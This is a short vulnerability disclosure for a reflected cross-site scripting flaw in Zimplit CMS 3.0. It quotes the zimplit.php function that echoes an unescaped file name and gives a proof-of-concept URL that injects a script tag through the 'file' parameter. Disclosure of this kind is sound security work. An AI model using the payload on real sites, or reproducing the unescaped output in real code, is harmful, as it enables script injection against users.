# Vulnerability title : Zimplit CMS Reflected XSS
# Exploit Author bl4ck_mohajem
# Vendor Homepage : http://www.zimplit.com
# Download Software :
http://www.zimplit.com/download/zimplit_cms_3.0_standalone.zip
# Version : 3.0
Vulnerable File:
===============
zimplit.php
Vulnerable Code:
===============
//Create new html file
function newFile($file) {
if (file_exists($file)) {
return 'The file '.$file.' already exists.';
}
if (touch($file)) {
chmod($file,0666);
return true;
} else {
return 'The file '.$file.' cannot be created.';
}
}
PoC:
===
http://localhost/zimplit.php?action=new&file=a<script>alert(1)</script>
=============
[+] Discovered by :bl4ck_mohajem (mohajem.war@gmail.com
[+] Special Thanks : Und3rgr0unD security team